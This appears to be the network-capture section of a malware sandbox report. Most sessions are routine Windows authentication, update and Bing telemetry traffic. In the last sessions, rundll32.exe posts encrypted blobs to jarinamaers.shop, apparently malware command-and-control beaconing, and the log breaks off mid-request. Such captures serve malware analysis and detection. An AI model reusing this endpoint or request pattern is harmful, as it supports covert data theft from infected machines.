                                                                                                2024-04-26 21:15:20 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:21 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:21 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: acbcf4be-1d0c-42cd-9e15-9167ad24e438
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F06D V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:20 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1918
                                                                                                2024-04-26 21:15:21 UTC | 1918 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                12 | 192.168.2.5 | 49727 | 23.46.214.6 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:15:20 UTC | 161 | OUT | HEAD /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-04-26 21:15:20 UTC | 466 | IN | HTTP/1.1 200 OK
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                Content-Type: application/octet-stream
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Server: ECAcc (chd/073D)
                                                                                                X-CID: 11
                                                                                                X-Ms-ApiVersion: Distribute 1.2
                                                                                                X-Ms-Region: prod-eus-z1
                                                                                                Cache-Control: public, max-age=35308
                                                                                                Date: Fri, 26 Apr 2024 21:15:20 GMT
                                                                                                Connection: close
                                                                                                X-CID: 2


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                13 | 192.168.2.5 | 49728 | 23.46.214.6 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:15:21 UTC | 239 | OUT | GET /fs/windows/config.json HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                Accept-Encoding: identity
                                                                                                If-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMT
                                                                                                Range: bytes=0-2147483646
                                                                                                User-Agent: Microsoft BITS/7.8
                                                                                                Host: fs.microsoft.com
                                                                                                2024-04-26 21:15:21 UTC | 520 | IN | HTTP/1.1 200 OK
                                                                                                Content-Type: application/octet-stream
                                                                                                Last-Modified: Tue, 16 May 2017 22:58:00 GMT
                                                                                                ETag: "0x64667F707FF07D62B733DBCB79EFE3855E6886C9975B0C0B467D46231B3FA5E7"
                                                                                                ApiVersion: Distribute 1.1
                                                                                                Content-Disposition: attachment; filename=config.json; filename*=UTF-8''config.json
                                                                                                X-MSEdge-Ref: Ref A: 86D4C1EC23844E65A40A9F1508D7BABF Ref B: BL2EDGE2514 Ref C: 2023-04-05T23:36:05Z
                                                                                                Cache-Control: public, max-age=35250
                                                                                                Date: Fri, 26 Apr 2024 21:15:21 GMT
                                                                                                Content-Length: 55
                                                                                                Connection: close
                                                                                                X-CID: 2
                                                                                                2024-04-26 21:15:21 UTC | 55 | IN | Data Ascii: {"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                14 | 192.168.2.5 | 49729 | 40.126.28.23 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:15:21 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:21 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                2024-04-26 21:15:22 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:21 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: 41f11c11-53a7-4e05-a290-f480c5b4381e
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F8FE V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:21 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
                                                                                                2024-04-26 21:15:22 UTC | 11393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                15 | 192.168.2.5 | 49730 | 40.126.28.23 | 443
                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                2024-04-26 21:15:21 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
                                                                                                2024-04-26 21:15:21 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-26 21:15:22 UTC | 568 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:21 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C555_SN1
                                                                                                x-ms-request-id: 95a20bbe-a652-4a9b-9936-d7f772a345cc
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0C5 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:21 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 1918
2024-04-26 21:15:22 UTC | 1918 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
16 | 192.168.2.5 | 49731 | 40.126.28.23 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:26 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
2024-04-26 21:15:26 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-26 21:15:26 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:26 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: eba35b0b-f7cc-48b4-8869-fc70ddaa7f39
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F05D V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:25 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
2024-04-26 21:15:26 UTC | 11393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
17 | 192.168.2.5 | 49734 | 52.165.165.26 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:26 UTC | 306 | OUT | GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
2024-04-26 21:15:27 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "XAopazV00XDWnJCwkmEWRv6JkbjRA9QSSZ2+e/3MzEk=_2880"
                                                                                                MS-CorrelationId: c27c82e2-f659-45a1-9739-785206ae3739
                                                                                                MS-RequestId: 2b6327df-02c3-420b-b0ea-80f8f98a9326
                                                                                                MS-CV: f7IaBxLOM06ZaUbR.0
                                                                                                X-Microsoft-SLSClientCache: 2880
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Fri, 26 Apr 2024 21:15:26 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 24490
2024-04-26 21:15:27 UTC | 15824 | IN | Data: binary content of environment.cab (begins with the cabinet signature MSCF)
2024-04-26 21:15:27 UTC | 8666 | IN | Data: binary content of environment.cab (continued)


Session ID | Source IP | Source Port | Destination IP | Destination Port
18 | 192.168.2.5 | 49735 | 23.1.237.91 | 443
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:26 UTC | 2148 | OUT | POST /threshold/xls.aspx HTTP/1.1
                                                                                                Origin: https://www.bing.com
                                                                                                Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                Accept: */*
                                                                                                Accept-Language: en-CH
                                                                                                Content-type: text/xml
                                                                                                X-Agent-DeviceId: 01000A410900D492
                                                                                                X-BM-CBT: 1696428841
                                                                                                X-BM-DateFormat: dd/MM/yyyy
                                                                                                X-BM-DeviceDimensions: 784x984
                                                                                                X-BM-DeviceDimensionsLogical: 784x984
                                                                                                X-BM-DeviceScale: 100
                                                                                                X-BM-DTZ: 120
                                                                                                X-BM-Market: CH
                                                                                                X-BM-Theme: 000000;0078d7
                                                                                                X-BM-WindowsFlights: FX:117B9872,FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E
                                                                                                X-Device-ClientSession: DB0AFB19004F47BC80E5208C7478FF22
                                                                                                X-Device-isOptin: false
                                                                                                X-Device-MachineId: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}
                                                                                                X-Device-OSSKU: 48
                                                                                                X-Device-Touch: false
                                                                                                X-DeviceID: 01000A410900D492
                                                                                                X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,staticsh
                                                                                                X-MSEdge-ExternalExpType: JointCoord
                                                                                                X-PositionerType: Desktop
                                                                                                X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                X-Search-CortanaAvailableCapabilities: None
                                                                                                X-Search-SafeSearch: Moderate
                                                                                                X-Search-TimeZone: Bias=-60; DaylightBias=-60; TimeZoneKeyName=W. Europe Standard Time
                                                                                                X-UserAgeClass: Unknown
                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
                                                                                                Host: www.bing.com
                                                                                                Content-Length: 2484
                                                                                                Connection: Keep-Alive
                                                                                                Cache-Control: no-cache
                                                                                                Cookie: MUID=2F4E96DB8B7049E59AD4484C3C00F7CF; _SS=SID=1A6DEABB468B65843EB5F91B47916435&CPID=1714166094970&AC=1&CPH=d1a4eb75; _EDGE_S=SID=1A6DEABB468B65843EB5F91B47916435; SRCHUID=V=2&GUID=3D32B8AC657C4AD781A584E283227995&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20231004; SRCHHPGUSR=SRCHLANG=en&IPMH=986d886c&IPMID=1696428841029&HV=1696428756; CortanaAppUID=5A290E2CC4B523E2D8B5E2E3E4CB7CB7; MUIDB=2F4E96DB8B7049E59AD4484C3C00F7CF
2024-04-26 21:15:26 UTC | 1 | OUT | Data Ascii: <
2024-04-26 21:15:26 UTC | 2483 | OUT | Data Ascii: ClientInstRequest><CID>3644FD74DF16618F08F7EC03DE556001</CID><Events><E><T>Event.ClientInst</T><IG>75228156703A40D5B97E5A6836F2A1CE</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","T":"CI.BoxModel","FID":"CI
2024-04-26 21:15:27 UTC | 480 | IN | HTTP/1.1 204 No Content
                                                                                                Access-Control-Allow-Origin: *
                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                X-MSEdge-Ref: Ref A: A8CBD3DF30E64354BA608CE89960CE4F Ref B: LAX311000115007 Ref C: 2024-04-26T21:15:27Z
                                                                                                Date: Fri, 26 Apr 2024 21:15:27 GMT
                                                                                                Connection: close
                                                                                                Alt-Svc: h3=":443"; ma=93600
                                                                                                X-CDN-TraceID: 0.57ed0117.1714166127.13696855


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
19 | 192.168.2.5 | 49736 | 40.126.28.23 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:27 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4775
                                                                                                Host: login.live.com
2024-04-26 21:15:27 UTC | 4775 | OUT | Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-26 21:15:27 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:27 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: e9e11725-9439-4a1a-ab56-39acd821c4a5
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F03C V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:26 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 11393
2024-04-26 21:15:27 UTC | 11393 | IN | Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
20 | 192.168.2.5 | 49738 | 40.126.28.23 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:15:30 UTC | 422 | OUT | POST /RST2.srf HTTP/1.0
                                                                                                Connection: Keep-Alive
                                                                                                Content-Type: application/soap+xml
                                                                                                Accept: */*
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                Content-Length: 4717
                                                                                                Host: login.live.com
2024-04-26 21:15:30 UTC | 4717 | OUT
                                                                                                Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
2024-04-26 21:15:31 UTC | 569 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-store, no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/soap+xml; charset=utf-8
                                                                                                Expires: Fri, 26 Apr 2024 21:14:31 GMT
                                                                                                P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                Referrer-Policy: strict-origin-when-cross-origin
                                                                                                x-ms-route-info: C511_SN1
                                                                                                x-ms-request-id: d172ca6e-4f62-4524-a75a-67ca8da5165a
                                                                                                PPServer: PPV: 30 H: SN1PEPF0002F0A3 V: 0
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Strict-Transport-Security: max-age=31536000
                                                                                                X-XSS-Protection: 1; mode=block
                                                                                                Date: Fri, 26 Apr 2024 21:15:31 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 10921
2024-04-26 21:15:31 UTC | 10921 | IN
                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
21 | 192.168.2.5 | 49740 | 52.165.165.26 | 443 | |
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:16:06 UTC | 306 | OUT | GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=rhgEMuw7VOs9VaZ&MD=8y7rrUUn HTTP/1.1
                                                                                                Connection: Keep-Alive
                                                                                                Accept: */*
                                                                                                User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33
                                                                                                Host: slscr.update.microsoft.com
2024-04-26 21:16:06 UTC | 560 | IN | HTTP/1.1 200 OK
                                                                                                Cache-Control: no-cache
                                                                                                Pragma: no-cache
                                                                                                Content-Type: application/octet-stream
                                                                                                Expires: -1
                                                                                                Last-Modified: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                ETag: "Mx1RoJH/qEwpWfKllx7sbsl28AuERz5IYdcsvtTJcgM=_2160"
                                                                                                MS-CorrelationId: 5ff47aae-c0a5-4a25-b4cd-7df33ccb5e98
                                                                                                MS-RequestId: 48e9e28f-0dea-4192-b52a-b2eafb9269aa
                                                                                                MS-CV: Ui5OsUe7FUWmZk2X.0
                                                                                                X-Microsoft-SLSClientCache: 2160
                                                                                                Content-Disposition: attachment; filename=environment.cab
                                                                                                X-Content-Type-Options: nosniff
                                                                                                Date: Fri, 26 Apr 2024 21:16:05 GMT
                                                                                                Connection: close
                                                                                                Content-Length: 25457
2024-04-26 21:16:06 UTC | 15824 | IN
2024-04-26 21:16:06 UTC | 9633 | IN


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
22 | 192.168.2.5 | 49745 | 104.21.46.75 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:16:51 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 252
                                                                                                Cache-Control: no-cache
2024-04-26 21:16:51 UTC | 252 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RrE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWcU2zBcOi1zByb6r/MDH0rsFSMp8mZTvyJ72osQdyKaxgMuGRefsWOR5RMSFOJjFQBgQSYk=
2024-04-26 21:16:58 UTC | 584 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:16:58 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XBBfu%2BC%2BI3Gqty1j4yr1v%2B4%2BtPJLu%2BNms76%2BheuVeV56HimXkCHmLxzllOqwct3YHpOKsYZHrz2%2F6Ym5bfAQ3O%2FJW9IYINLScMVBw5j5py2v2g%2FW9FqPIM92QpZWZeOq8ZXd"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a998a86810a570-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 21:16:58 UTC | 26 | IN | Data Raw: 31 34 0d 0a 51 68 4f 6d 4d 42 32 6e 70 54 56 71 44 4a 4f 6f 63 51 3d 3d 0d 0a
                                                                                                Data Ascii: 14QhOmMB2npTVqDJOocQ==
2024-04-26 21:16:58 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
23 | 192.168.2.5 | 49746 | 104.21.46.75 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:17:01 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 184
                                                                                                Cache-Control: no-cache
2024-04-26 21:17:01 UTC | 184 | OUT
                                                                                                Data Ascii: YjOeEyiMk3RqE5vcC/HWCbEd2NSiCzBvkB27+tXTLWmAUbmKni5eydH76c544w3dA5mBWLUUfs9FloPMfPu+9sL8KXzJchOQ6zFrHlvIJjJ3oLAU9UsMGwYUwxiToRp5DZO7/9fjHWGGPBjkOue4BHa09V9+9KX8562paVZF1iIqoByVDHyUWQ==
2024-04-26 21:17:04 UTC | 570 | IN | HTTP/1.1 200 OK
                                                                                                Date: Fri, 26 Apr 2024 21:17:04 GMT
                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                Transfer-Encoding: chunked
                                                                                                Connection: close
                                                                                                CF-Cache-Status: DYNAMIC
                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0U3HQjQwUVdJkBoPjJBqyUy6A70OzW51ZVkwm0kixsm2eVSYHeI0ZvxNQL4IuX4gO47MtyTbXU9NUD26poQuSlt7cnFV6UHkPsAO9p%2BKb1CP0nTEfeWsji5mEyfTYq7dkY%2FB"}],"group":"cf-nel","max_age":604800}
                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                Server: cloudflare
                                                                                                CF-RAY: 87a998e2fef7a4ca-MIA
                                                                                                alt-svc: h3=":443"; ma=86400
2024-04-26 21:17:04 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
24 | 192.168.2.5 | 49747 | 104.21.46.75 | 443 | 180 | C:\Windows\System32\rundll32.exe
Timestamp | Bytes transferred | Direction | Data
2024-04-26 21:17:05 UTC | 229 | OUT | POST /live/ HTTP/1.1
                                                                                                Accept: */*
                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Tob 1.1)
                                                                                                Host: jarinamaers.shop
                                                                                                Content-Length: 184
                                                                                                Cache-Control: no-cache
2024-04-26 21:17:05 UTC | 184 | OUT
